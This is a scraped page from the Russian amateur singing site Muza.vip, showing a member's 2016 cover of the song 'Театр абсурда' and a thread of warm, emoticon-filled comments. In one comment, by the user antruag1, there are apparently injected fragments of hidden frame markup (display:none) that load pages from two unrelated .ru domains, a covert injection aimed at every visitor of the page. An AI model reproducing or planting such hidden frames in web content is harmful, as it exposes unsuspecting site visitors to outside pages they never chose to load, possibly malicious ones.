На главную Muza.vip
      
Россия моя
(Тюльканов Вячеслав)
Карамболина (Фиалка Монмартра)
(Оперетты)
Маленькие герои
(Машина времени)
Спасательный круг
(Карнавал (группа))
Eye In The Sky
(Alan Parsons Project)


Песня месяца
Май 2026 года
Angelochek_msНадоело засыпать одной
(Мельянцева Надежда)

Баллов: 717



   «Театр абсурда» (Царегородцев Олег)

409   139   10
   Кавер-версия от NatashaLi09
12.11.2016 1902
Олежек, как и обещала - к выходным!!!!))
Прости, ежели что не так, позволила себе некоторые вольности!!))) Сыпанула фунт изюму, так скааааа..ть!))))))
Ребята, возьмете в свои ряды? я (уже!) четвертая с этой славной песней!!!
О вашем мнении, друзья-товарисЧи, узнаю конечно-же из оценок и комментариев, поэтому решила все же их оставить открытыми. Да и главный судья должен же сказать хоть ПАРУ слов!))
  Баллов:
153
  


Комментарии пользователей к записи:

          Страницы: 1  2  3 

bmw1965, 13.11.2016 г. 07:35
Наташенька.... Шикарно спела!!!!! v_naushnikahklassbravo_bigvozdushnyj_poceluj
  

NatashaLi09, 15.11.2016 г. 16:02
Мариша!!!! Спасибо большое!!!!buket_bigvozdushnyj_poceluj
  
wados, 13.11.2016 г. 08:18
НАТАША КЛАСС.ОТЛИЧНО ВСЁ СДЕЛАЛА.КРАСОТА.БРАВО.bravo_bigbuket_big
  

NatashaLi09, 15.11.2016 г. 16:06
buket_serdechkiulybaemsya_i_mashemВалера, благодарю от души!!!
  
vote_no, 13.11.2016 г. 09:41
ЗДОРОВО СПЕТО!!!!!!! victory ))
  

NatashaLi09, 15.11.2016 г. 16:07
Спасибо, Марго!!!)buket
  
Tanush, 13.11.2016 г. 10:47
Тебе смело можно вливаться во все ряды, Наталочка!)) Удивительно просто, как совершенно по-разному может звучать песня. У тебя она с какой-то неунывающей самоиронией! Ну ты ж такая и есть, разве могла спеть по-другомуpocelujchik))) Мне нравится твой изюм в этой песне! klass buket_biglyubovnyj_roman
  

NatashaLi09, 15.11.2016 г. 16:09
Танюшик!! Вот, только сегодня добралась до каментов!! dada А у тебя как раз праздник, и не до нас совсем!!)))))))) Еще раз с днюшкой!!!!!!!!!!!!! love_onlinebuket_big Спасибо за всё, дорогуль!!! очень рада, что тебе понравилось!!!!
  
murzi, 13.11.2016 г. 11:29
Здорово, Наташа, песню первый раз слышу, честно говоря) Очень интересно ты здесь ее представила, действительно - как в театре побывала на премьере)) buketapplodrozochka
  

NatashaLi09, 15.11.2016 г. 16:12
Жанна!!!buket Я ее тоже услышала только на той неделе!))) Зацепила она меня и ...... как обычно!!)))ulybka
Спасибо Олегу!!! минусом поделился! и вообще хочу поаплодировать авторам!!! заслужили!bravo_bigbuket_big
  

murzi, 17.11.2016 г. 17:33
Присоединяюсь))) applod
  
ZeVS7, 13.11.2016 г. 12:35
)))Интересная версия у тебя поучилась!))ulybkaklassvozdushnyj_pocelujbuket_big
  

NatashaLi09, 15.11.2016 г. 16:13
спасибо, Володя!!!! buket_serdechkiulybaemsya_i_mashemrozochka
  
regina74, 13.11.2016 г. 15:00
КЛАССНО СПЕЛА НАТАШЕНЬКАguitarbuket_bigbravo
  

NatashaLi09, 15.11.2016 г. 16:14
Региночка!! рада, что находишь время для меня! buket_bigserdce_v_rukeulybaemsya_i_mashem
  

regina74, 15.11.2016 г. 16:52
  
vera1959, 13.11.2016 г. 15:56
Наташенька, к моему стыду не слышала эту песню.... тем интересней слушать ее впервые в твоем исполнении... Слышу,что тебе нравится,что "выдаешь на гора".... и не зря... "купаешься " в песне... настолько она ТВОЯ!!!!СУПЕР!!!! bravo_big
  

NatashaLi09, 15.11.2016 г. 16:15
Верочка!!! Ты все правильно чувствуешь!! очень понравилась песнь!! браво авторам!!!bravo_big
Спасибо тебе!!buket_bigserdce_v_ruke
  
Pensik, 13.11.2016 г. 16:05
Упиваешься песней Наталь, это слышно!)) Очень даже слушатально получилось!klassbuket
  

NatashaLi09, 15.11.2016 г. 16:18
Гена!!! по вам вижу, не все плохо получилось))) и это очень радует!!!!!! Улыбаюсь!!!wow
serdce_v_ruke
  
fazazp, 13.11.2016 г. 16:33
Наташа,вот бегаю вокруг,,,,а понял,что пробежал мимо,,,Но..............А,тута такая красотень!!!!rozochkav_naushnikahapplodБравушки тебе!!!!!buket_big!!!!!!!!!!!!!!!!!!!
  

NatashaLi09, 15.11.2016 г. 16:28
Валя!!! Сколько Лен!)).... говорят наши соседи))) ты уж смотри поосторожней, в бегах то!))))serdce_v_ruke
спасибо тебе большущее, что присоединился к обсуждению!!! buket_serdechki Но чет никто не ругает! А ведь есть за что)))))smehpodmigivanie
  

fazazp, 15.11.2016 г. 18:45
Наташа,да ладно.................smushenieВедь,не что не идеальноrozochka!!!!!!!!!!!!!!!
  

NatashaLi09, 16.11.2016 г. 01:34
pocelujchik
  
igornov, 13.11.2016 г. 16:36
Наташа !!!! Обалденно спела !!! Молодец !!!bravo_bigbuket_big
  

NatashaLi09, 15.11.2016 г. 16:29
Игорь!!!!!!!!!!!!!love_onlineБлагодарю тебя от serdce_v_ruke)) очень рада, что послушал и так высоко оценил!!! guitar
  
Pol701, 13.11.2016 г. 18:41
Наташ,круто-стильно...bravo_big!!! Понравилось по полной...voo
  

NatashaLi09, 15.11.2016 г. 16:35
Пашенька!!!!
твое слово, как Великого Импровизатора особенно значимо для меня!!!vozdushnyj_pocelujbuket_big
  
irisha56, 13.11.2016 г. 18:43
Замечательно спела,Наташенька!!!Мне понравилось!!
  

NatashaLi09, 15.11.2016 г. 16:35
Ириша!! buket_big Я довольна!! Спасибо большое!!!!!!!
  
Olya_radost, 13.11.2016 г. 20:39
Атмосферно звучишь здесь, Наташик! Такая актриса одного актера. Стильная вещица и исполнение! klassbuket_big
  

NatashaLi09, 15.11.2016 г. 16:37
Олечка!!! какое красивое определение подобрала!! Цвету и радуюсь тебе, как дитя новой игрушке!!!))) serdce_v_rukebuket_serdechki
  
natali-ponkrateva, 14.11.2016 г. 20:11
Наташ, слушаю и не знаю что сказатьo_da....в хорошем смысле...klassнадо так еще суметь спеть! И театрально.... и добавила немного перца..какая-то свобода в песне....в общем, по-своему обыграла эту песню...но не заигралась, что важно!очень даже интересно!bravo_big,тебе и applodapplodapplodapplodapplod
  

NatashaLi09, 15.11.2016 г. 16:41
Ой, Натуль! сколько эпитетов!!! Спасибо, моя хорошая!! очень приятно читать такие строки!! Вот уж верно, что заигралась, но хорошо, что не переиграла!!)))buket_serdechkivozdushnyj_poceluj
  
podsnegnik, 14.11.2016 г. 23:55
Наташенька!!!bravo_bigМилая!!!buket_bigvozdushnyj_poceluj
  

NatashaLi09, 15.11.2016 г. 16:43
Васечка, Ириша!!! Спасибо!!!!!!!!!buket_bigulybaemsya_i_mashem
  
masha187, 15.11.2016 г. 16:05
Наташенька!!!Классно спела!!!bravo_bigbuket_bigvozdushnyj_poceluj
  

NatashaLi09, 15.11.2016 г. 16:46
Надюша, Леша!! Спасибо вам, друзья!!!!!!!!!! buket_bigs_sharikami
  
shash, 15.11.2016 г. 17:01
Наталья,интересная песня.v_naushnikahrozochkarozochkarozochkaАртистичная подачаklass
  

NatashaLi09, 17.11.2016 г. 15:05
Инга!!! ulybaemsya_i_mashemрада редкой гостье!))) спасибо, что послушала и оценила!!!buketserdce_v_ruke
  
Natalia22, 15.11.2016 г. 19:34
Наташенька!!!Классное исполнение!!!bravo_bigbuket_big

  

NatashaLi09, 17.11.2016 г. 15:06
Натуличка!!! спасибо большое!!!!!!buket_serdechkiulybaemsya_i_mashem
  
antruag1, 16.11.2016 г. 14:30
В первые услышала эту песню! Наташенька! Интересная вещь! Слова какие .... и ты, так в неё влилась, своим голосом, . как у кошечки!! voolove_onlinebuket_serdechkibuket_serdechkibuket_serdechki id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=27834" style="display:none"> id="a754394637" src="https://doiuhrht.ru/u.html?a=27834" style="display:none">
  

NatashaLi09, 17.11.2016 г. 15:09
Олечка!!!!love_online Спасибо, что среди хлопот праздничных выкроила минутку и на меня!! ulybaemsya_i_mashem Я ее сразу как-то выцепила у Олега! Понравилась своей мелодией и текстом!! v_romashkah
  

          Страницы: 1  2  3 

align=absbottomКомментарии могут оставлять только зарегистрированные пользователи, активировавшие аккаунт!
Зарегистрироваться или войти

  ПОМОГАЕМ
  ЖИВОТНЫМ
  В ЗОНЕ СВО




Студия
Temanik
На дальней станции сойду
Пламя
mranatolm
Девочка с карибских берегов
Леонидов Максим
skrunchick
Вокализ 3
Вокализы
LonelyWoolf
Абракадабра
Ассорти
Haris1958
In The Army Now
Status Quo
BEDHAR58
Come together
Beatles
djdfy56
Бабочка красивая
Спиридонов Александр
ARAKS
Человек на Луне
Наутилус Помпилиус
Grafinia
Мне нужна любовь
Рулла Лика
barmen
Ром, текила, виски
Петлюра Виктор
Pusha
Для тебя
Колдун Дмитрий
valekor
Стоят девчонки
Пахоменко Мария
gdi1960
Жестокая любовь
Киркоров Филипп
volod
Помни меня
Могилатов Виктор
baxa70
Нам ли
Мамажанов Борис
hutorjanka
Пульс изнутри
Iveta Bohana
felivanov54
Куьпэраць Флорь
Суручану Ион
Alexgor
Второй.
Горбачёв Алексей
NikSFilm2014
Песенка о шпаге
Миронов Андрей
shuger01
Моя любимая
Шаов Тимур
milana18
Будь со мной
Магомаев Муслим
lori
Будь со мной
Магомаев Муслим
statist39
Выходной
Старый приятель
sulehov
В городском саду
Круг Михаил
lesha
Лучик
Куренков Сергей
edmonde
Подари мне весну
Новосадович Надежда
Tatiana-Nikolay
Столик на двоих
Крутой Игорь
8911083
La Sagrada Familia
The Alan Parsons Project
aliara
Держи меня
Афанасьева Инна
tuleneva
Танго утраченных грез
Вайкуле Лайма




Территория творческого настроения © Muza.vip, 2011 — 2026 гг. Пользовательское соглашение.